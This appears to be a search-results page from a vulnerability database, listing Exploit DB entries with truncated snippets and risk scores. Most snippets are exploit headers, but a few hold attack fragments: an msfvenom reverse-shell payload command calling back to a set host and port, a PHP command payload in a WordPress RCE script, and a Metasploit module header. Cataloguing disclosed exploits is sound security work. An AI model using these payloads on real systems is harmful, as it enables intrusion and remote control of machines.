Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2025/04/14 12:0 a.m.263 views

GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)

Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting Exploit Author: m4xth0r Maximiliano Belino Author website: https://maxibelino.github.io/ Author email: max.cybersecurity at belino.com GitHub disclosure link:...

6.1CVSS7.1AI score0.00782EPSS
Exploits3
Exploit DB
Exploit DB
added 2023/08/21 12:0 a.m.263 views

EuroTel ETL3100 - Transmitter Default Credentials

Exploit Title: EuroTel ETL3100 Transmitter Default Credentials Exploit Author: LiquidWorm Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L Product web page: https://www.eurotel.it | https://www.siel.fm Affected version: v01c01 Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter v01x...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/06/20 12:0 a.m.263 views

Nokia ASIKA 7.13.52 - Hard-coded private key disclosure

// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure // Date: 2023-06-20 // Exploit Author: Amirhossein Bahramizadeh // Category : Hardware // Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/ // Version: 7.13.52...

7CVSS6.5AI score0.00956EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/04/06 12:0 a.m.263 views

Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure

Exploit Title: Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirag...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/04/06 12:0 a.m.263 views

Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)

Exploit Title: Simple Task Managing System v1.0 - SQL Injection Unauthenticated Date: 2022-01-09 Exploit Author: Hamdi Sevben Vendor Homepage: https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html Software Link:...

9.8CVSS9.7AI score0.20693EPSS
Exploits5
Exploit DB
Exploit DB
added 2023/03/27 12:0 a.m.263 views

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting XSS Exploit Author: Sinem Şahin Date: 2022-10-08 Vendor Homepage: https://www.csphere.eu/ Version: 2011.4 Tested on: Windows & XAMPP == Tutorial http://HOST/index.php?mod=buddys&action=create&id=925872 2- Write XSS Payload into th...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.263 views

ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure

Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.manageengine.com/ Software Link: https://www.manageengine.com/products/self-service-password/download.html Details:...

8.8CVSS9.1AI score0.07947EPSS
Exploits4
Exploit DB
Exploit DB
added 2022/02/16 12:0 a.m.263 views

TeamSpeak 3.5.6 - Insecure File Permissions

Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions Date: 2022-02-15 Exploit Author: Aryan Chehreghani Contact: [email protected] Vendor Homepage: https://www.teamspeak.com Software Link: https://www.teamspeak.com/en/downloads Version: 3.5.6 Tested on: Windows 10 x64 About -...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2022/02/02 12:0 a.m.263 views

WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control

Exploit Title: WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control Date: 2/28/2021 Author: 0xB9 Software Link: https://wordpress.org/plugins/contact-fo...ck-tester/ Version: 1.0.2 Tested on: Windows 10 CVE: CVE-2021-24247 1. Description: The plugin settings are visible to all...

5.4CVSS5.8AI score0.04682EPSS
Exploits5
Exploit DB
Exploit DB
added 2021/10/06 12:0 a.m.263 views

Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection

Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection Date: 05.10.2021 Exploit Author: Emel Basayar Vendor: Odine Solutions - odinesolutions.com Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/ Version: 1.0 Category: Webapps Tested on: Ubunt...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/15 12:0 a.m.263 views

libbabl 0.1.62 - Broken Double Free Detection (PoC)

Exploit Title: libbabl 0.1.62 - Broken Double Free Detection PoC Date: December 14, 2020 Exploit Author: Carter Yagemann Vendor Homepage: https://www.gegl.org Software Link: https://www.gegl.org/babl/ Version: libbabl 0.1.62 and newer Tested on: Debian Buster Linux 4.19.0-9-amd64 Compile: gcc...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/06 12:0 a.m.263 views

Microsoft NET USE win10 - Insufficient Authentication Logic

Title: Microsoft NET USE win10 - Insufficient Authentication Logic Date: 2020-04-04 Author: hyp3rlinx Vendor: www.microsoft.com CVE: N/A + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/10/07 12:0 a.m.263 views

CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation

Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation Date: 2019-01-30 Exploit Author: Jakub Palaczynski Vendor Homepage: https://www.checkpoint.com/ Version: Check Point Endpoint Security VPN = E80.87 Build 986009514 Version: Check Point ZoneAlarm =...

7.8CVSS7.9AI score0.01038EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/09/12 12:0 a.m.263 views

Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts

Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs such as the Chrome, Firefox and Edge browsers and constitutes an attack surface for memory...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.263 views

ChaosPro 2.1 - SEH Buffer Overflow

!C:\Python27\python.exe Title : ChaosPro 2.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" the payload payload += msfvenom -p windows/shellreversetcp LHOST=10.0.7.17 LPORT=4444 -e...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/08/15 12:0 a.m.263 views

Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- 188c.47fc: Access violation - code c0000005 first chance First chance exceptions are reported before any exception handling. This...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/01/08 12:0 a.m.263 views

Wireshark - 'get_t61_string' Heap Out-of-Bounds Read

The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of Wireshark, by feeding a malformed file to tshark "$ ./tshark -nVxr /path/to/file". --- cut --- ================================================================= ==16936==ERROR: AddressSanitizer:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2011/02/07 12:0 a.m.263 views

ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)

ProFTPD modsftp Integer Overflow by Kingcope reference: http://www.castaglia.org/proftpd/modules/modsftp.html Exploit Title: ProFTPD modsftp Integer Overflow Date: 7 February 2011 Author: Kingcope Software Link: http://www.castaglia.org/proftpd/modules/modsftp.html Tested on: Centos 5.5 Program...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/04/16 12:0 a.m.262 views

NagVis 1.9.33 - Arbitrary File Read

Exploit Title: NagVis 1.9.33 - Arbitrary File Read Date: 03/12/2024 Exploit Author: David Rodríguez a.k.a. xerosec Vendor Homepage: https://www.nagvis.org/ Software Link: https://www.nagvis.org/downloads/archive Version: 1.9.33 Tested on: Linux CVE: CVE-2022-46945 import requests import argparse...

9.1CVSS7.4AI score0.04135EPSS
Exploits3
Exploit DB
Exploit DB
added 2025/04/14 12:0 a.m.262 views

GestioIP 3.5.7 - Remote Command Execution (RCE)

Exploit Title: GestioIP 3.5.7 - Remote Command Execution RCE Exploit Author: m4xth0r Maximiliano Belino Author website: https://maxibelino.github.io/ Author email max.cybersecurity at belino.com GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760 Date: 2025-01-13...

9.8CVSS7.1AI score0.45109EPSS
Exploits5
Exploit DB
Exploit DB
added 2025/04/11 12:0 a.m.262 views

GeoVision GV-ASManager 6.1.0.0 - Broken Access Control

Exploit Title: Broken Access Control in GeoVision GV-ASManager Google Dork: inurl:"ASWeb/Login" Date: 02-FEB-2025 Exploit Author: Giorgi Dograshvili DRAGOWN Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Version: 6.1.0.0 or less Tested...

8.8CVSS8.8AI score0.23232EPSS
Exploits4
Exploit DB
Exploit DB
added 2025/03/27 12:0 a.m.262 views

KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)

Exploit Title: KubeSphere 3.4.0 - Insecure Direct Object Reference IDOR Date: 3 September Exploit Author: Okan Kurtulus Vendor Homepage: https://kubesphere.io Software Link: https://github.com/kubesphere/kubesphere Version: = 4.0.0 & = 3.0.0 & 3.4.1 Tested on: Ubuntu 22.04 CVE : CVE-2024-46528 1-...

4.3CVSS4.6AI score0.01618EPSS
Exploits2
Exploit DB
Exploit DB
added 2023/07/20 12:0 a.m.262 views

PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2285 Release Date: ============= 2023-07-19 Vulnerability Laboratory ID VL-ID: ==================================== 2285 Common...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/07/19 12:0 a.m.262 views

Vaidya-Mitra 1.0 - Multiple SQLi

Title: Vaidya-Mitra 1.0 - Multiple SQLi Author: nu11secur1ty Date: 07.12.2023 Vendor: https://mayurik.com/ Software: free: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html, https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/07/03 12:0 a.m.262 views

FuguHub 8.1 - Remote Code Execution

Exploit Title: FuguHub 8.1 - Remote Code Execution Date: 6/24/2023 Exploit Author: redfire359 Vendor Homepage: https://fuguhub.com/ Software Link: https://fuguhub.com/download.lsp Version: 8.1 Tested on: Ubuntu 22.04.1 CVE : CVE-2023-24078 import requests from bs4 import BeautifulSoup import...

8.8CVSS8.8AI score0.53239EPSS
Exploits9
Exploit DB
Exploit DB
added 2023/05/02 12:0 a.m.262 views

OpenEMR v7.0.1 - Authentication credentials brute force

Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force Date: 2023-04-28 Exploit Author: abhhi Abhishek Birdawade Vendor Homepage: https://www.open-emr.org/ Software Link: https://github.com/openemr/openemr/archive/refs/tags/v701.tar.gz Version: 7.0.1 Tested on: Windows ''' Example...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/03/27 12:0 a.m.263 views

eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)

Exploit Title: eXtplorer= 2.1.14 - Authentication Bypass & Remote Code Execution RCE Exploit Author: ErPaciocco Author Website: https://erpaciocco.github.io Vendor Homepage: https://extplorer.net/ Vendor: ============== extplorer.net Product: ================== eXtplorer = v2.1.14 eXtplorer is a...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.262 views

Joomla Plugin SexyPolling 2.1.7 - SQLi

Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi Google Dork: intext:"Powered by Sexy Polling" Date: 2022-02-08 Exploit Author: Wolfgang Hotwagner Vendor Homepage: https://2glux.com/projects/sexypolling Software Link: https://2glux.com/downloads/files/free/sexypollingpack2.1.72glux.com.zip...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/05/11 12:0 a.m.262 views

Wondershare Dr.Fone 11.4.10 - Insecure File Permissions

Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions Date: 04/25/2022 Exploit Author: AkuCyberSec https://github.com/AkuCyberSec Vendor Homepage: https://drfone.wondershare.com/ Software Link: https://download.wondershare.com/drfonefull3360.exe Version: 11.4.10 Tested on: Window...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/02/28 12:0 a.m.262 views

Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)

Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting XSS Authenticated Date: 24.02.2022 Exploit Author: Fikrat Ghuliev Ghuliev Vendor Homepage: https://cipi.sh/ Software Link: https://cipi.sh/ Version: 3.1.15 Tested on: Ubuntu When the user wants to add a new server on the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/02/28 12:0 a.m.262 views

Casdoor 1.13.0 - SQL Injection (Unauthenticated)

// Exploit Title: Casdoor 1.13.0 - SQL Injection Unauthenticated // Date: 2022-02-25 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://casdoor.org/ // Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0 // Version: version 1.13.1 // Security Advisory:...

7.5CVSS7.5AI score0.58927EPSS
Exploits9
Exploit DB
Exploit DB
added 2022/02/10 12:0 a.m.262 views

WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)

Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting XSS Date: 2022-02-07 Author: Milad karimi Software Link: https://wordpress.org/plugins/contact-forms-builder/ Version: 1.6.1 Tested on: Windows 11 CVE: N/A 1. Description: This plugin creates a Contact Form Builder...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.262 views

Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)

Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow DoS Discovered by: Yehia Elghaly Discovered Date: 22/12/2021 Vendor Homepage: https://www.accu-time.com/ Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ Tested Version: 1.0 Vulnerability Type:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/09/13 12:0 a.m.262 views

ECOA Building Automation System - Missing Encryption Of Sensitive Information

Exploit Title: ECOA Building Automation System - Missing Encryption Of Sensitive Information Date: 25.06.2021 Exploit Author: Neurogenesia Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Missing Encryption Of Sensitive Information Vendor: ECOA Technologies Corp. Product we...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/08/13 12:0 a.m.262 views

RATES SYSTEM 1.0 - Authentication Bypass

Exploit Title: RATES SYSTEM 1.0 - Authentication Bypass Date: 2020-08-13 Exploit Author: Azumah Foresight Xorlali M4sk0ff Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/07/16 12:0 a.m.262 views

Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection

Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection Date: 15.07.2021 Discovered by: Jeroen - IT Nerdbox Exploit Author: Metin Yunus Kandemir Version: sg2000-2000.1331 Vendor Homepage: https://www.seagate.com/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/03/09 12:0 a.m.262 views

Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)

Golden FTP Server 4.70 - 'PASS' Buffer Overflow 2 Author: 1F98D Original Authors: Craig Freyman cd1zz and Gerardo Iglesias Galvan iglesiasgg Tested on Windows 10 x64 A buffer overflow exists in GoldenFTP during the authentication process. Note that the source ip address of the user performing the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/08 12:0 a.m.262 views

Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS)

Exploit Title: Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting XSS Date: 2020-08-25 Exploit Author: Kailash Bohara Vendor Homepage: https://www.altn.com/ Version: Mdaemon webmail 3. We can see execution code and after saving it, each time we visits the distribution list...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/16 12:0 a.m.262 views

Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)

const OFFSETELEMENTREFCOUNT = 0x10; const OFFSETJSABVIEWVECTOR = 0x10; const OFFSETJSABVIEWLENGTH = 0x18; const OFFSETLENGTHSTRINGIMPL = 0x04; const OFFSETHTMLELEMENTREFCOUNT = 0x14; const LENGTHARRAYBUFFER = 0x8; const LENGTHSTRINGIMPL = 0x14; const LENGTHJSVIEW = 0x20; const...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/04 12:0 a.m.262 views

Online Marriage Registration System 1.0 - Remote Code Execution (1)

Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution Google Dork: N/A Date: 2020-05-31 Exploit Author: Selim Enes 'Enesdex' Karaduman Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/05/15 12:0 a.m.262 views

vBulletin 5.6.1 - 'nodeId' SQL Injection

Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection Date: 2020-05-15 Exploit Author: Photubias Vendor Advisory: 1 https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcementsaa/4440032-vbulletin-5-6-1-security-patch-level-1 Version: vBulletin v5.6.x prior to Patch Level 1...

9.8CVSS9.3AI score0.88948EPSS
Exploits13
Exploit DB
Exploit DB
added 2020/05/10 12:0 a.m.262 views

Pi-hole < 4.4 - Authenticated Remote Code Execution

!/usr/bin/env python3 Pi-hole = 4.4 RCE Author: Nick Frichette Homepage: https://frichetten.com Note: This exploit must be run with root privileges and port 80 must not be occupied. While it is possible to exploit this from a non standard port, for the sake of simplicity and not having to modify...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/01/07 12:0 a.m.262 views

Job Portal 1.0 - Remote Code Execution

Exploit Title: Job Portal 1.0 - Remote Code Execution Google Dork: N/A Date: 2020-01-03 Exploit Author: Tib3rius Vendor Homepage: https://phpgurukul.com/job-portal-project/ Software Link: https://phpgurukul.com/?smdprocessdownload=1&downloadid=7855 Version: 1.0 Tested on: Ubuntu 16.04 CVE: N/A...

9.8AI score
Exploits0
Exploit DB
Exploit DB
added 2019/10/30 12:0 a.m.262 views

iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure

Title: iSeeQ Hybrid DVR WH-H4 2.0.0.P - getjpeg Stream Disclosure Date: 2019-10-29 Author: LiquidWorm Vendor:iSeeQ Link: http://www.iseeq.co.kr CVE: N/A !/bin/bash iSeeQ Hybrid DVR WH-H4 1.03R / 2.0.0.P getjpeg Stream Disclosure Vendor: iSeeQ Product web page: http://www.iseeq.co.kr Affected...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/08/02 12:0 a.m.262 views

Sar2HTML 3.2.1 - Remote Command Execution

Exploit Title: sar2html Remote Code Execution Date: 01/08/2019 Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web application you will see index.php?plot url...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/03/01 12:0 a.m.262 views

WordPress Core 5.0 - Remote Code Execution

var wpnonce = ''; var ajaxnonce = ''; var wpattachedfile = ''; var imgurl = ''; var postajaxdata = ''; var postid = 0; var cmd = '?php phpinfo;/'; var cmdlen = cmd.length var payload = '\xff\xd8\xff\xed\x004Photoshop...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2015/06/24 12:0 a.m.262 views

Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'msf/core/post/windows/reflectivedllinjection' require 'rex' class Metasploit3 'Windows ClientCopyImage Win32k Exploit', 'Description' = %q Thi...

7.8CVSS7.8AI score0.562EPSS
Exploits38
Exploit DB
Exploit DB
added 2025/07/08 12:0 a.m.261 views

Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover

Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover Date: October 25, 2024 Exploit Author: stealthcopter Vendor Homepage: https://stacksmarket.co/ Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/ Version: = 5.2.3 Tested on: Ubuntu...

9.8CVSS6.6AI score0.07959EPSS
Exploits3
Exploit DB
Exploit DB
added 2025/04/16 12:0 a.m.261 views

Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)

Exploit Title: Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution RCE via file upload Date: 2024-08-28 Exploit Author: Photubias Vendor Homepage: https://dell.com Vendor Advisory: 1...

9.8CVSS7.4AI score0.9079EPSS
Exploits3
Exploit DB
Exploit DB
added 2025/04/09 12:0 a.m.261 views

ChurchCRM 5.9.1 - SQL Injection

Exploit Title: ChurchCRM 5.9.1 - SQL Injection Author: Sanan Qasimzada Date: 06.07.2024 Vendor: http://churchcrm.io/ Software: https://github.com/ChurchRM/CRM Reference: https://portswigger.net/web-security/sql-injection Description: In the manual insertion point 1 - parameter EID appears to be...

7.4AI score
Exploits0
Total number of security vulnerabilities5000